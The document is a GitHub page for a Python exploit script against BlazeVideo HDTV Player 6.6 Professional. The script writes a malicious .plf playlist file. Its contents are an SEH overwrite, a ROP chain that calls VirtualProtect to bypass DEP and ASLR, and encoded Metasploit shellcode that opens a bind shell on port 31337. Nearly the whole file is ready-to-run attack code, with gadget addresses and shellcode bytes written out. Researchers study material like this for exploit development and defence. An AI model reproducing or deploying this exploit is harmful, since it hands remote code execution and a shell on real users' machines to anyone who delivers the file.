-
Notifications
You must be signed in to change notification settings - Fork 19
Expand file tree
/
Copy pathblaze_66_exploit_rop.py
More file actions
103 lines (83 loc) · 4.45 KB
/
blaze_66_exploit_rop.py
File metadata and controls
103 lines (83 loc) · 4.45 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Win 7/8 DEP+ASLR Bypass)
# Date: 03/18/2018
# Exploit Author: tiptiptip (based on spawm exploit)
# Just updated the ROP with the one generated by Mona with fixes :P
import struct
file = 'blaze_exploit_rop.plf'
totalsize = 5000
adv = struct.pack('<L', 0x613010b8) * 218 # ADD ESP,10 RETN 0x613010B8
seh = struct.pack('<L', 0x61303744) # ADD ESP,800 0x61303744
ropnop = struct.pack('<L', 0x61326003) * 44 # RETN (ROP NOP) [DTVDeviceManager.dll]
#========================
def create_rop_chain():
rop_gadgets = [
0x6404ff59, # POP ECX # RETN [MediaPlayerCtrl.dll]
0x640562cc, # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
0x6401d210, # MOV EAX,DWORD PTR DS:[ECX] # RETN [MediaPlayerCtrl.dll]
0x640365ee, # XCHG EAX,ESI # RETN [MediaPlayerCtrl.dll]
0x60328828, # POP EBP # RETN [Configuration.dll]
0x6161055a, # & push esp # ret 0c [EPG.dll]
# (Not working, not in .text section) 0x6034be03, # jmp esp [Configuration.dll]
0x61324378, # POP EAX # RETN [DTVDeviceManager.dll]
# (Changed from 201 to 501) 0xfffffdff, # Value to negate, will become 0x00000201
0xfffffaff, # Value to negate, will become 0x00000501
0x61336e8b, # NEG EAX # RETN [DTVDeviceManager.dll]
0x61641c70, # XCHG EAX,EBX # RETN [EPG.dll]
0x6162a3e2, # POP EAX # RETN [EPG.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6404dc34, # NEG EAX # RETN [MediaPlayerCtrl.dll]
# (Damage ESI) 0x64011f80, # XCHG EAX,EDX # POP ESI # ADD ESP,8 # RETN 0x0C [MediaPlayerCtrl.dll]
# (No longer required) 0x41414141, # Filler (compensate)
# (No longer required) 0x41414141, # Filler (compensate)
0x61336e78, # XCHG EAX,EDX # TEST EAX,16AFFFF # POP EAX # RETN ** [DTVDeviceManager.dll] ** | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_READ}
0x41414141, # Filler (compensate)
0x6404ff59, # POP ECX # RETN [EPG.dll]
# (Permission = RWE, Not working if DEP is enabled) 0x6405f857, # &Writable location [MediaPlayerCtrl.dll]
0x60351111, # &Writable location [MediaPlayerCtrl.dll]
0x61322ba3, # POP EDI # RETN [DTVDeviceManager.dll]
0x6403e80e, # RETN (ROP NOP) [MediaPlayerCtrl.dll]
0x6132bf7b, # POP EAX # RETN [DTVDeviceManager.dll]
0x90909090, # nop
0x6033375d, # PUSHAD # RETN [Configuration.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#=======================
nop = '\x90' * 32
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,
shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69")
payload = adv + seh + ropnop + rop_chain + nop + shellcode
derp = 'C' * (totalsize - len(payload))
payload = payload + derp
f = open(file,'w')
f.write(payload)
print "File",file, "created..."
f.close()